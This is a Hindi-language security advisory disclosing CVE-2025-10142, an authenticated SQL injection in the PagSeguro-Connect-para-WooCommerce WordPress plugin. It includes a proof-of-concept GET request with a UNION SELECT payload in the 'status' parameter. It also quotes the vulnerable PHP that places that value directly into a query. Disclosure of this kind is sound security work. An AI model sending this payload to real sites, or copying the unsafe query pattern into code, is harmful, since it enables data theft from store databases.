
CVE-2025-10142 के लिए प्रकटीकरण
CVE-2025-10142 के लिए प्रकटीकरण
यह रिपॉज़िटरी PagSeguro-Connect-para-WooCommerce <= 4.44.3 में खोजी गई एक भेद्यता का प्रकटीकरण करता है, जो रिकार्डो मार्टिंस द्वारा विकसित WordPress प्लगइन है।
| CVE ID | प्रकार | घटक | प्रभाव |
|---|---|---|---|
| CVE-2025-10142 | प्रमाणित (Shop Manager+) SQL इंजेक्शन | src/Connect/Recurring/Admin/Subscriptions/SubscriptionList.php | प्रमाणित हमलावर डेटा बाहर निकाल सकता है |
GET /wp-admin/admin.php?page=rm-pagbank-subscriptions&status=' UNION SELECT CAST(version() AS CHAR),2,3,4,5,6,7,8,9,10,11,12,13,14,15 -- -
status पैरामीटर को बिना escaping किए या $wpdb->prepare() का उपयोग किए बिना सीधे SQL क्वेरी में जोड़ दिया जाता है
if (!empty($_REQUEST['status'])) {
$status = sanitize_text_field(wp_unslash($_REQUEST['status']));
$where .= " AND status = '$status'";
}
$this->items = $wpdb->get_results(
$wpdb->prepare(
"SELECT * FROM {$wpdb->prefix}pagbank_recurring WHERE $where ORDER BY $orderby $order LIMIT %d OFFSET %d",
$per_page,
($current_page - 1) * $per_page
),
ARRAY_A
);
...
चूँकि ShopManager से हमला संभव है, खतरा काफी कम है। बाहरी इनपुट को $where में डालकर, उस $where को सीधे SQL सिंटैक्स में डालने की प्रक्रिया का पता लगाना थोड़ा कठिन था।
नाम: MooseLove
भूमिका: स्वतंत्र सुरक्षा शोधकर्ता / बग हंटर
संपर्क: अनुरोध पर उपलब्ध
यह एडवाइज़री सार्वजनिक सुरक्षा जागरूकता के लिए प्रदान की गई है। श्रेय के साथ साझा करने के लिए स्वतंत्र है।